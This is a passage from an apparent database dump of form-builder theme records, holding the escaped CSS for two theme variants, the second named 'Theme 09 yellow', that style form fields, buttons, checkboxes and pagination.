width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #727272;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/01/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(32,'Theme 09 yellow','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #E9B500;\r\nmargin-bottom: 10px;\r\ncolor: #E9B500;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #E9B500;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #DDDDDD;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 